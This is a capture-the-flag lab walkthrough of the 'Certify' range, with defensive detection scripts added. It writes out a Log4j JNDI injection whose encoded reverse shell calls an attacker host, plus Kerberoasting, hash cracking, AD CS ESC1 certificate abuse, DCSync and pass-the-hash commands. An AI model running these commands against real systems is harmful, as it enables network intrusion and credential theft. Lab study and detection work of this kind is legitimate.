春秋云镜-Certify

This article was updated on 2025.03.09

Pentesting


flag01

Sweep the target with fscan first:

fscan -h 39.99.134.186

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.3
start infoscan
39.99.134.186:8983 open
39.99.134.186:80 open
39.99.134.186:22 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle http://39.99.134.186 code:200 len:612 title:Welcome to nginx!
[*] WebTitle http://39.99.134.186:8983 code:302 len:0 title:None 跳转url: http://39.99.134.186:8983/solr/
[*] WebTitle http://39.99.134.186:8983/solr/ code:200 len:16555 title:Solr Admin
已完成 3/3
[*] 扫描结束,耗时: 53.6961754s

Visiting the web service shows that Log4j is in use.

A DNS callback confirms the Log4j lookup fires, so the next step is JNDI injection through Log4j:

/solr/admin/cores?action=${jndi:ldap://1p9bvr.dnslog.cn}
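From the defender's side, the request above is what should trip an alert in the Solr or nginx access log. As an added example (not part of the original writeup), a small detector that URL-decodes each request path and flags JNDI lookup strings; the log lines are constructed and the callback host is a placeholder.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original writeup). Lines 3
# and 4 carry a JNDI lookup in the query string, the fourth one URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Oct/2024:19:07:31 +0800] "GET /solr/admin/cores?action=STATUS HTTP/1.1" 200 1342
10.0.0.5 - - [28/Oct/2024:19:07:40 +0800] "GET /solr/ HTTP/1.1" 200 16555
203.0.113.9 - - [28/Oct/2024:19:14:33 +0800] "GET /solr/admin/cores?action=${jndi:ldap://callback.example/x} HTTP/1.1" 200 612
203.0.113.9 - - [28/Oct/2024:19:15:02 +0800] "GET /solr/admin/collections?action=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example%3A1389%2Fx%7D HTTP/1.1" 500 0
"""

# Common-log-format request line: source IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d+)'
)
# A JNDI lookup, case-insensitive, tolerating whitespace; captures the scheme.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def decode_fully(value, rounds=3):
    """URL-decode repeatedly, because payloads are often double-encoded."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_jndi_requests(log_text):
    """Return (source_ip, raw_path, scheme) for every request carrying a JNDI lookup."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        lookup = JNDI_RE.search(decode_fully(match.group("path")))
        if lookup:
            hits.append((match.group("src"), match.group("path"), lookup.group(1).lower()))
    return hits


if __name__ == "__main__":
    for src, path, scheme in find_jndi_requests(SAMPLE_LOG):
        print(f"{src} -> {scheme} lookup in {path}")
```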

Usage of welk1n/JNDI-Injection-Exploit at v1.0:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c " {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzE1Ni4yMzguMjMzLjU1LzIzMzMgMD4mMQ==}|{base64,-d}|{bash,-i}" -A 156.238.233.55

http://39.99.134.186:8983/solr/admin/collections?action=${jndi:ldap://156.238.233.55:1389/xi4rks}

Another tool, Mr-xn/JNDIExploit-1:

http://39.99.134.186:8983/solr/admin/collections?action=${jndi:ldap://156.238.233.55:1389/Basic/ReverseShell/156.238.233.55/2333}

Shell received.

The shell runs as an unprivileged user, but grc is configured in sudoers and can be used to escalate privileges.

flag01 obtained.

flag01: flag{692d0ff1-2b22-4052-8126-5731fe7e1e8f}

flag02

Set up a proxy and scan the internal network:

./fscan -h 172.22.9.19/24

Scan results:

[*] Icmp alive hosts len is: 4
172.22.9.7:445 open
172.22.9.26:445 open
172.22.9.47:445 open
172.22.9.7:139 open
172.22.9.7:135 open
172.22.9.26:139 open
172.22.9.47:139 open
172.22.9.26:135 open
172.22.9.7:80 open
172.22.9.7:88 open
172.22.9.47:80 open
172.22.9.47:22 open
172.22.9.19:80 open
172.22.9.19:22 open
172.22.9.47:21 open
172.22.9.19:8983 open
[*] alive ports len is: 16
start vulscan
[*] WebTitle http://172.22.9.19 code:200 len:612 title:Welcome to nginx!
[*] NetInfo
[*]172.22.9.26
[->]DESKTOP-CBKTVMO
[->]172.22.9.26
[*] WebTitle http://172.22.9.47 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[*] NetInfo
[*]172.22.9.7
[->]XIAORANG-DC
[->]172.22.9.7
[*] NetBios 172.22.9.7 [+] DC:XIAORANG\XIAORANG-DC
[*] NetBios 172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.9.47 fileserver Windows 6.1
[*] OsInfo 172.22.9.47 (Windows 6.1)
[*] WebTitle http://172.22.9.19:8983 code:302 len:0 title:None 跳转url: http://172.22.9.19:8983/solr/
[*] WebTitle http://172.22.9.19:8983/solr/ code:200 len:16555 title:Solr Admin
[*] WebTitle http://172.22.9.7 code:200 len:703 title:IIS Windows Server
[+] PocScan http://172.22.9.7 poc-yaml-active-directory-certsrv-detect

Let's analyze the results and sort out the approach.

172.22.9.7 DC:XIAORANG\XIAORANG-DC

172.22.9.26 Windows Server 2016 Datacenter 14393

172.22.9.47 fileserver

172.22.9.19: the external-facing host.

One machine is already done, one is the DC, one is a file server, and one more is an internal host.

The file server can be logged into over SMB:

proxychains4 impacket-smbclient 172.22.9.47


flag02: flag{4dc07eb1-3cc4-4c71-a95e-bfcbb9e01056}

flag03

We just picked up a .db file; let's see what's inside.

Wow, I'm about to rant. Export the data first. Since there isn't much, just select all and copy it out, or use Navicat's export feature; the exported values are wrapped in double quotes, so simply delete them all.

proxychains4 crackmapexec smb 172.22.9.26 -u user.txt -p pass.txt --continue-on-success

Two hits:

xiaorang.lab\zhangjian:i9XDE02pLVf
xiaorang.lab\liupeng:fiAzGwEMgTY

RDP fails for both. The flag02 hint mentions SPN; searching around gives:

Because Kerberos authentication relies on SPNs, attackers may try to abuse SPNs for authentication attacks such as "Kerberoasting": using the configured SPNs to obtain Kerberos service tickets and then attempting to crack the service accounts' hashes offline.

Use impacket-GetUserSPNs to Kerberoast every SPN:

proxychains4 impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
proxychains4 impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/liupeng:fiAzGwEMgTY

Got four hashes, though some are duplicates.
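
On the blue-team side, the GetUserSPNs runs above leave a characteristic trace: one account requesting RC4 service tickets for several service accounts within seconds. As an added example (not from the original writeup), a detector over constructed, simplified 4769 events (flattened to key=value pairs; the account and service names are made up).

```python
from collections import defaultdict

# Constructed, simplified Security events (ID 4769, "A Kerberos service ticket was
# requested"), one per line; not from the original writeup. 0x17 = RC4-HMAC, 0x12 = AES256.
SAMPLE_EVENTS = """\
EventID=4769 Account=alice@XIAORANG.LAB Service=svc_sql TicketEncryptionType=0x17 Client=172.22.9.19 Time=21:06:40
EventID=4769 Account=alice@XIAORANG.LAB Service=svc_web TicketEncryptionType=0x17 Client=172.22.9.19 Time=21:06:40
EventID=4769 Account=alice@XIAORANG.LAB Service=svc_backup TicketEncryptionType=0x17 Client=172.22.9.19 Time=21:06:41
EventID=4769 Account=alice@XIAORANG.LAB Service=svc_report TicketEncryptionType=0x17 Client=172.22.9.19 Time=21:06:41
EventID=4769 Account=bob@XIAORANG.LAB Service=svc_sql TicketEncryptionType=0x12 Client=172.22.9.26 Time=21:10:02
EventID=4769 Account=bob@XIAORANG.LAB Service=DESKTOP-CBKTVMO$ TicketEncryptionType=0x17 Client=172.22.9.26 Time=21:10:05
EventID=4768 Account=bob@XIAORANG.LAB Service=krbtgt TicketEncryptionType=0x12 Client=172.22.9.26 Time=21:10:00
"""


def parse_event(line):
    """Turn 'k=v k=v ...' into a dict."""
    return dict(field.split("=", 1) for field in line.split())


def kerberoast_suspects(events_text, min_services=3):
    """Return {account: [services]} for accounts that requested RC4 service tickets
    for at least min_services distinct user (non-machine) service accounts."""
    by_account = defaultdict(set)
    for line in events_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "4769":
            continue
        if ev.get("TicketEncryptionType", "").lower() != "0x17":
            continue  # AES tickets are not the classic roasting signal
        service = ev.get("Service", "")
        if service.endswith("$") or service.lower() == "krbtgt":
            continue  # machine accounts and krbtgt have long random passwords
        by_account[ev["Account"]].add(service)
    return {acct: sorted(svcs) for acct, svcs in by_account.items()
            if len(svcs) >= min_services}


if __name__ == "__main__":
    for acct, svcs in kerberoast_suspects(SAMPLE_EVENTS).items():
        print(f"{acct} requested RC4 tickets for {len(svcs)} service accounts: {', '.join(svcs)}")
```

The same data also points at the fix: the cracked accounts here had human-chosen passwords, which is exactly what long random passwords (or gMSAs) and AES-only service accounts remove.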

Crack them with hashcat, letting it auto-detect the hash type:

hashcat hash.txt rockyou.txt

Two account passwords recovered:

xiaorang.lab\zhangxia   MyPass2@@6
xiaorang.lab\chenchen @Passw0rd@

Tried RDP with these as well, but still got nothing.

Next, look for AD CS template vulnerabilities. Enumerate the certificate templates:

proxychains4 certipy-ad find -u 'zhangxia@xiaorang.lab'  -password 'MyPass2@@6' -dc-ip 172.22.9.7 -vulnerable -stdout

There is an ESC1: request a certificate from the XR Manager template while impersonating the domain administrator to obtain administrator.pfx, then use administrator.pfx to get a TGT and the NTLM hash.

Going at it directly times out here.

Adding a hosts entry fixes that:

proxychains4 certipy-ad req -u 'zhangxia@xiaorang.lab' -p 'MyPass2@@6' -target 172.22.9.7 -dc-ip 172.22.9.7 -ca 'xiaorang-XIAORANG-DC-CA' -template 'XR Manager' -upn 'administrator@xiaorang.lab'

Certificate obtained.

Now use the certificate to get the domain admin hash:

proxychains4 certipy-ad auth -pfx administrator.pfx -dc-ip 172.22.9.7

It errors out:

[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

Heavens, someone send a pentest master to save me. A few months later I tried again and it worked (I later learned that RBCD can be used for this attack; see 春秋云镜-MagicRelay for details).

Then pass-the-hash:

proxychains crackmapexec smb 172.22.9.26 -u administrator -H2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"

Alternatively, Certify together with Rubeus can also be used to get the domain admin hash:

C:\Users\zhangxia\Desktop\film>Certify.exe find /vulnerable

_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=xiaorang,DC=lab'

[*] Listing info about the Enterprise CA 'xiaorang-XIAORANG-DC-CA'

Enterprise CA Name : xiaorang-XIAORANG-DC-CA
DNS Hostname : XIAORANG-DC.xiaorang.lab
FullName : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
Cert Thumbprint : 37BFD9FE73CA81E18E7A87CEBD90AF267E57170E
Cert Serial : 43A73F4A37050EAA4E29C0D95BC84BB5
Cert Start Date : 2023/7/14 12:33:21
Cert End Date : 2028/7/14 12:43:21
Cert Chain : CN=xiaorang-XIAORANG-DC-CA,DC=xiaorang,DC=lab
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544

Access Rights Principal

Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
Allow ManageCA, ManageCertificates XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

CA Name : XIAORANG-DC.xiaorang.lab\xiaorang-XIAORANG-DC-CA
Template Name : XR Manager
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : 安全电子邮件, 加密文件系统, 客户端身份验证
mspki-certificate-application-policy : 安全电子邮件, 加密文件系统, 客户端身份验证
Permissions
Enrollment Permissions
Enrollment Rights : NT AUTHORITY\Authenticated UsersS-1-5-11
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Domain Users S-1-5-21-990187620-235975882-534697781-513
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
Object Control Permissions
Owner : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
WriteOwner Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteDacl Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519
WriteProperty Principals : XIAORANG\Administrator S-1-5-21-990187620-235975882-534697781-500
XIAORANG\Domain Admins S-1-5-21-990187620-235975882-534697781-512
XIAORANG\Enterprise Admins S-1-5-21-990187620-235975882-534697781-519



Certify completed in 00:00:10.0749826
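The XR Manager block above shows every ESC1 precondition at once: ENROLLEE_SUPPLIES_SUBJECT, a Client Authentication EKU, zero authorized signatures, no manager approval (no PEND_ALL_REQUESTS), and enrollment rights for Authenticated Users/Domain Users. As an added example for auditing your own templates (not code from the writeup or from Certify), a parser for a simplified one-line-per-attribute version of that output plus a check that reports a template only when all five conditions hold; the sample templates are constructed.

```python
# Constructed sample in the layout of Certify's template output, simplified to one
# "key : value" line per attribute; not copied from the original writeup.
SAMPLE = """\
Template Name : XR Manager
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Secure Email, Encrypting File System, Client Authentication
Enrollment Rights : NT AUTHORITY\\Authenticated Users, XIAORANG\\Domain Admins

Template Name : Approved User
msPKI-Certificate-Name-Flag : SUBJECT_ALT_REQUIRE_UPN
mspki-enrollment-flag : PEND_ALL_REQUESTS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication
Enrollment Rights : XIAORANG\\Domain Users
"""

# Principals that make "anyone can enroll" true, and EKUs usable for logon.
LOW_PRIV = {"authenticated users", "domain users", "domain computers", "everyone"}
AUTH_EKUS = {"client authentication", "smart card logon", "pkinit client authentication", "any purpose"}


def parse_templates(text):
    """Split blank-line-separated blocks into dicts: lowercase key -> list of values."""
    templates, current = [], {}
    for line in text.splitlines() + [""]:  # trailing "" flushes the last block
        if not line.strip():
            if current:
                templates.append(current)
            current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip().lower()] = [v.strip() for v in value.split(",") if v.strip()]
    return templates


def esc1_findings(tpl):
    """Return the ESC1 conditions met, or [] unless all five hold (template abusable)."""
    reasons = []
    if "ENROLLEE_SUPPLIES_SUBJECT" in tpl.get("mspki-certificate-name-flag", []):
        reasons.append("enrollee supplies subject/SAN")
    ekus = {e.lower() for e in tpl.get("pkiextendedkeyusage", [])}
    if not ekus or ekus & AUTH_EKUS:
        reasons.append("EKU permits client authentication")
    if tpl.get("authorized signatures required", ["0"])[0] == "0":
        reasons.append("no authorized signature required")
    if "PEND_ALL_REQUESTS" not in tpl.get("mspki-enrollment-flag", []):
        reasons.append("no manager approval")
    principals = {p.split("\\")[-1].lower() for p in tpl.get("enrollment rights", [])}
    if principals & LOW_PRIV:
        reasons.append("low-privileged principals may enroll")
    return reasons if len(reasons) == 5 else []
```

Removing any one condition (manager approval, as in the second sample template, or dropping ENROLLEE_SUPPLIES_SUBJECT) is enough to close ESC1 on that template.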

Enroll a certificate for XIAORANG\Administrator using the XR Manager template:

Certify.exe request /ca:CA01.xiaorang.lab\xiaorang-CA01-CA /template:"XR Manager" /altname:XIAORANG.LAB\Administrator

It errors out:

[*] Action: Request a Certificates

[*] Current user context : XIAORANG\zhangxia
[*] No subject name specified, using current context as subject.

[*] Template : XR Manager
[*] Subject : CN=zhangxia, CN=Users, DC=xiaorang, DC=lab
[*] AltName : XIAORANG.LAB\Administrator

[*] Certificate Authority : CA01.xiaorang.lab\xiaorang-CA01-CA
[X] Error sending the certificate request: System.Runtime.InteropServices.COMException (0x800706BA): CCertRequest::Submit: RPC 服务器不可用。 0x800706ba (WIN32: 1722 RPC_S_SERVER_UNAVAILABLE)
在 CERTCLILib.ICertRequest3.Submit(Int32 Flags, String strRequest, String strAttributes, String strConfig)
在 Certify.Cert.SendCertificateRequest(String CA, String message)
在 Certify.Cert.RequestCert(String CA, Boolean machineContext, String templateName, String subject, String altName, Boolean install)

Had this succeeded, it would have produced a PEM certificate file; that certificate is then converted to .pfx format:

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Then authenticate with Rubeus or certipy:

Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password: /ptt

Once the ticket is obtained, dump the hash:

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

flag03: flag{525886c4-919b-473f-9d7f-6a263c8e2d0f}

flag04

proxychains crackmapexec smb 172.22.9.7 -u administrator -H2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"


flag04: flag{654ca06e-4170-49c5-bfd5-18701a20c385}

References:

春秋云境 Certify WP - fdx_xdf - 博客园

Certify - 春秋云境 | h0ny’s blog